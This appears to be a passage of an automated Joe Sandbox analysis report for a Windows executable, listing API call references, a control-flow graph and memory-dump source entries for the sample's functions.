    • __Stoull.NTSTC_LIBCMT ref: 0048CA8C
    • __Stoull.NTSTC_LIBCMT ref: 0048CAB0
    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00484D53,00000005,00000000,00000000), ref: 0048CAE2
    • WriteFile.KERNEL32(00000000,00484D53,00000000,?,00000000), ref: 0048CB0B
    • WriteFile.KERNEL32(00000000,00484D53,00000001,?,00000000), ref: 0048CB64
      • Part of subcall function 00490DF7: ___initconout.LIBCMT ref: 00490E06
      • Part of subcall function 00490DF7: WriteConsoleW.KERNEL32(FFFFFFFE,00000000,00000001,?,00000000), ref: 00490E29
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0048CCD2
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0048CDAC
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 0048CE7C
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0048CEAD
    • GetLastError.KERNEL32 ref: 0048CEC3
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0048CF04
    • GetLastError.KERNEL32(?,?,00484D53,00000000,?,?,004011C4,00000001,001BC8A4), ref: 0048CF23
      • Part of subcall function 0048B884: IsDebuggerPresent.KERNEL32 ref: 00490272
      • Part of subcall function 0048B884: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00490287
      • Part of subcall function 0048B884: UnhandledExceptionFilter.KERNEL32(004987AC), ref: 00490292
      • Part of subcall function 0048B884: GetCurrentProcess.KERNEL32(C0000409), ref: 004902AE
      • Part of subcall function 0048B884: TerminateProcess.KERNEL32(00000000), ref: 004902B5
      • Part of subcall function 0048E62D: SetFilePointer.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0048C995,00000000,00000000,00000000,00000002,00000000,00000001), ref: 0048E66F
      • Part of subcall function 0048E62D: GetLastError.KERNEL32(?,0048C995,00000000,00000000,00000000,00000002,00000000,00000001,00000000,SMH,0048D054,00000000,00000108,?,004A18E0,00000010), ref: 0048E67C
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
      • Part of subcall function 0042A8A0: GetTickCount.KERNEL32(00000003,?,?,?,?,?,00000001,00424817,?,?,?,00000000,00000000,00000000,00000001), ref: 0042A968
      • Part of subcall function 0042AA60: GetTickCount.KERNEL32 ref: 0042AB6E
      • Part of subcall function 0042BD50: _strncpy.LIBCMT ref: 0042BDF3
      • Part of subcall function 0042BAA0: _strncpy.LIBCMT ref: 0042BB42
      • Part of subcall function 0042BAA0: _strncpy.LIBCMT ref: 0042BB64
      • Part of subcall function 004147A0: GetCPInfo.KERNEL32(000004E4,?), ref: 004147D1
      • Part of subcall function 004147F0: CloseHandle.KERNEL32(?), ref: 00414858
      • Part of subcall function 0046F550: GetCPInfo.KERNEL32(0000FDE9,?,?,004162E2,0000000C), ref: 0046F595
      • Part of subcall function 0046F550: GetCPInfo.KERNEL32(0000FDE9,?,?,004162E2,0000000C), ref: 0046F62F
      • Part of subcall function 0042C010: _strncpy.LIBCMT ref: 0042C045
      • Part of subcall function 0042B090: _strncpy.LIBCMT ref: 0042B0B3
      • Part of subcall function 0042B090: FindFirstFileA.KERNEL32(?,?,?,0000005C,?,?,?), ref: 0042B146
      • Part of subcall function 0042B090: FindNextFileA.KERNEL32(00000000,00000010), ref: 0042B1CA
      • Part of subcall function 0042B090: FindClose.KERNEL32(?,00000003,?,?,?,?,?), ref: 0042B291
      • Part of subcall function 0042B090: GetTickCount.KERNEL32(00000003,?,?,?,?,?), ref: 0042B2DE
      • Part of subcall function 0042B090: FindNextFileA.KERNEL32(?,?,00000003,?,?,?,?,?), ref: 0042B3CA
      • Part of subcall function 0042B090: FindClose.KERNEL32(?,?,?,?), ref: 0042B47C
      • Part of subcall function 0042B090: FindFirstFileA.KERNEL32(?,?), ref: 0042B4BA
      • Part of subcall function 0042B090: FindNextFileA.KERNEL32(?,00000010), ref: 0042B5A2
      • Part of subcall function 0042B090: FindClose.KERNEL32(?), ref: 0042B5B5
      • Part of subcall function 0042B090: FindClose.KERNEL32(?,?,00000000,000000FF,00000000,00000003,?,?,?,?,?), ref: 0042B5E9
      • Part of subcall function 0042B090: FindClose.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0042B603
      • Part of subcall function 00413770: _strncpy.LIBCMT ref: 00413989
      • Part of subcall function 00413770: RegConnectRegistryA.ADVAPI32(?), ref: 004139AB
      • Part of subcall function 0042B620: _strncpy.LIBCMT ref: 0042B667
      • Part of subcall function 0042B620: RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 0042B6B9
      • Part of subcall function 0042B620: RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0042B6E4
      • Part of subcall function 0042B620: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0042B76B
      • Part of subcall function 0042B620: RegCloseKey.ADVAPI32(?,00000003,?,?), ref: 0042B7E1
      • Part of subcall function 0042B620: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?), ref: 0042B84B
      • Part of subcall function 0042B620: RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,?), ref: 0042B8BD
      • Part of subcall function 0042B620: RegCloseKey.ADVAPI32(?,00000003,?,?), ref: 0042B945
      • Part of subcall function 0042B620: RegCloseKey.ADVAPI32(?,00000003,?,?), ref: 0042BA68
      • Part of subcall function 0042B620: RegCloseKey.ADVAPI32(?), ref: 0042BA82
    • RegCloseKey.ADVAPI32(?), ref: 00424A13
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 3516 48c39a-48c3ba 3517 48c3bd-48c3c0 3516->3517 3518 48c3c2-48c3c6 3517->3518 3519 48c3bc 3517->3519 3520 48c3f4 3518->3520 3521 48c3c8-48c3ca 3518->3521 3519->3517 3524 48c3f9 3520->3524 3522 48c3cc-48c3ce 3521->3522 3523 48c3ee-48c3f2 3521->3523 3525 48c3d0-48c3e2 call 489208 call 4891b6 3522->3525 3526 48c3e7-48c3ec 3522->3526 3527 48c3fd-48c406 3523->3527 3524->3527 3553 48c62d-48c630 3525->3553 3526->3524 3529 48c5ce-48c5d1 3527->3529 3530 48c40c-48c40f 3527->3530 3533 48c5cd 3529->3533 3534 48c5d3-48c5d6 3529->3534 3532 48c414-48c416 3530->3532 3538 48c534-48c538 3532->3538 3539 48c41c-48c422 3532->3539 3533->3529 3536 48c5ea-48c5fa call 490c99 3534->3536 3537 48c5d8-48c5e8 call 489208 call 4891b6 3534->3537 3547 48c5ff-48c604 3536->3547 3560 48c606-48c608 3537->3560 3538->3529 3544 48c53e 3538->3544 3542 48c4bb-48c4be 3539->3542 3543 48c428 3539->3543 3550 48c51a-48c521 3542->3550 3551 48c4c0-48c4c3 3542->3551 3548 48c4a9-48c4ad 3543->3548 3549 48c42a-48c42d 3543->3549 3552 48c541-48c544 3544->3552 3547->3560 3561 48c60a-48c629 3547->3561 3557 48c523-48c525 3548->3557 3559 48c4af-48c4b9 3548->3559 3555 48c433-48c436 3549->3555 3556 48c529-48c52e 3549->3556 3550->3557 3558 48c527 3550->3558 3562 48c4c5-48c4c6 3551->3562 3563 48c50a-48c510 3551->3563 3564 48c546-48c558 call 4868d6 3552->3564 3565 48c540 3552->3565 3567 48c48a-48c48d 3555->3567 3568 48c438-48c439 3555->3568 3556->3532 3556->3538 3557->3556 3558->3556 3559->3556 3571 48c62c 3560->3571 3561->3571 3572 48c4c8-48c4cb 3562->3572 3573 48c4f8-48c4fc 3562->3573 3563->3557 3569 48c512-48c518 3563->3569 3564->3537 3583 48c55a-48c55d 3564->3583 3565->3552 3567->3557 3578 48c493-48c4a4 3567->3578 3575 48c47e-48c485 3568->3575 3576 48c43b-48c43e 3568->3576 3569->3556 3571->3553 3579 48c4cd-48c4d0 3572->3579 3580 48c4e2-48c4e6 3572->3580 3573->3557 3577 48c4fe-48c508 3573->3577 3575->3557 3581 48c440-48c443 3576->3581 3582 48c46d-48c470 3576->3582 3577->3556 3578->3556 3579->3537 3585 48c4d6-48c4dc 3579->3585 3580->3557 3584 48c4e8-48c4f6 3580->3584 3586 48c445-48c448 3581->3586 3587 48c466-48c468 3581->3587 3582->3557 3590 48c476-48c479 3582->3590 3589 48c560-48c563 3583->3589 3584->3556 3585->3557 3588 48c4de-48c4e0 3585->3588 3586->3537 3593 48c44e-48c451 3586->3593 3587->3556 3588->3556 3591 48c565-48c568 3589->3591 3592 48c55f 3589->3592 3590->3556 3591->3537 3594 48c56a-48c56e 3591->3594 3592->3589 3593->3557 3595 48c457-48c461 3593->3595 3594->3594 3596 48c570-48c582 __Stoull 3594->3596 3595->3556 3597 48c58f-48c5a1 __Stoull 3596->3597 3598 48c584-48c58d 3596->3598 3599 48c5ae-48c5c0 __Stoull 3597->3599 3600 48c5a3-48c5ac 3597->3600 3598->3529 3599->3537 3601 48c5c2-48c5cb 3599->3601 3600->3529 3601->3529
    APIs
    • __Stoull.NTSTC_LIBCMT ref: 0048C54E
    • __Stoull.NTSTC_LIBCMT ref: 0048C578
      • Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230
    • __Stoull.NTSTC_LIBCMT ref: 0048C597
    • __Stoull.NTSTC_LIBCMT ref: 0048C5B6
    • __wsopen_s.LIBCMT ref: 0048C5FA
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0042E250: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000044,00000000), ref: 0042E5BE
      • Part of subcall function 0042E250: CloseHandle.KERNEL32(?), ref: 0042E5D0
      • Part of subcall function 0042E250: CloseHandle.KERNEL32(?), ref: 0042E611
      • Part of subcall function 0042E250: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000044,00000000), ref: 0042E62B
      • Part of subcall function 0042E250: SetCurrentDirectoryA.KERNEL32(?), ref: 0042E713
      • Part of subcall function 0042E250: GetFileAttributesA.KERNEL32 ref: 0042E775
      • Part of subcall function 0042E250: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop), ref: 0042E7A8
      • Part of subcall function 0042E250: ShellExecuteEx.SHELL32(0000003C), ref: 0042E7BE
      • Part of subcall function 0042E250: GetModuleHandleA.KERNEL32(kernel32.dll,GetProcessId), ref: 0042E7E2
      • Part of subcall function 0042E250: GetProcAddress.KERNEL32(00000000), ref: 0042E7E9
      • Part of subcall function 0042E250: GetLastError.KERNEL32 ref: 0042E829
      • Part of subcall function 0042E250: FormatMessageA.KERNEL32(00001200,00000000,00000000,00000000,?,000001FF,00000000), ref: 0042E862
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    • SendMessageTimeoutA.USER32(0000FFFF,0000001A,00000000,Environment,00000001,00003A98,?), ref: 00426085
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 00433630: __Stoull.NTSTC_LIBCMT ref: 00433718
      • Part of subcall function 00433630: GetWindowRect.USER32(?,?), ref: 00433875
      • Part of subcall function 00433630: EnumChildWindows.USER32(?,Function_0003A400,?), ref: 00433896
      • Part of subcall function 00433630: ScreenToClient.USER32(?,?), ref: 004338C6
      • Part of subcall function 00433630: GetWindowRect.USER32(00000000,?), ref: 004338F7
      • Part of subcall function 00433630: GetWindowThreadProcessId.USER32(?,00000000), ref: 00433A6E
      • Part of subcall function 00433630: AttachThreadInput.USER32(00000E10,?,00000001), ref: 00433AA8
      • Part of subcall function 00433630: SetActiveWindow.USER32(?), ref: 00433AC0
      • Part of subcall function 00433630: PostMessageA.USER32(?,00000201,00000001,?), ref: 00433B0F
      • Part of subcall function 00433630: PostMessageA.USER32(?,00000202,00000000,?), ref: 00433B41
      • Part of subcall function 00433630: PostMessageA.USER32(?,00000201,00000001,?), ref: 00433B6E
      • Part of subcall function 00433630: AttachThreadInput.USER32(00000E10,?,00000000), ref: 00433BA8
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Strings
    • Target label does not exist., xrefs: 00426AB6
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 004145F0: __Stoull.NTSTC_LIBCMT ref: 00414670
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
